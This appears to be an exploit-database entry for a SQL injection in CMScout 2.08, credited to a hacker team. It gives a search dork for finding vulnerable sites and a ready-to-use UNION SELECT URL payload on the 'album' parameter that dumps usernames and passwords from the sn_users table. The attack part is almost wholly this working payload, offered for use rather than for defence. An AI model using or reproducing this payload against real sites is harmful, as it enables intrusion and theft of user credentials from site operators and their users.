# Title: CMScout 2.08 SQL Injection Vulnerability # EDB-ID: # CVE-ID: () # OSVDB-ID: () # Author: Dr.0rYX and Cr3w-DZ # Published: # Verified: # Download Exploit Code # Download N/A NNNNNNNNAAAAAASSSSSSSSTTTTTTTTTTTT NNNNNNNNNNAAAAAASSSSSSSSSSSSTTTTTTTTTTTT NNNNNNNNNNAAAAAAAASSSSTTTTeeeeeeaaaaaammmmmmmmmm NNNNNNNNNNNNAAAAAAAASSSSSSSSSSTTTTeeeeeeeeaaaaaaaammmmmmmmmmmmmmmm NNNNNNNNNNNNAAAAAAAASSSSSSSSTTTTeeeeeeeeeeaaaaaammmmmmmmmmmm NNNNNNNNNNAAAAAAAAAAAAAASSSSTTTTeeeeaaaaaaaammmmmmmmmmmm NNNNNNNNNNAAAAAAAAAAAAAASSSSSSSSSSSSTTTTeeeeeeeeeeaaaaaaaammmmmmmmmmmm NNNNNNNNAAAAAAAASSSSSSSSTTTTeeeeeeaaaaaaaaaammmmmmmmmmmm ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!] Title :CMScout 2.08 SQL Injection Vulnerability [!] Author: Dr.0rYX and Cr3w-DZ [!] MAIL: vx3@hotmail.de&Cr3w@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.cmscout.za.net/ [+] script : CMScout 2.08 [+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9 [+] Vulnerability : php SQL injection [+] Dork :Powered by CMScout (c)2005 CMScout Group **************************************************************************/ [ Vulnerable File ] http://server/index.php?page=photos&album=[N.A.S.T ] [ Exploit ] http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users-- [ Example] http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users-- [Greets ] [+] :CLAW , exploit-db.com,all my friends....
体验盒子
